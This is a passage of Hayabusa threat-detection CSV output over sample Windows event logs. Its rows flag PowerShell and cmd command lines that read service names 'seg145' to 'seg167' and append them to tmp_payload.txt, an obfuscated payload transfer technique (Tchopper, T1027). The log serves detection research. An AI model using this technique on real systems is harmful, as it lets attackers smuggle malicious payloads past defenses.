0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 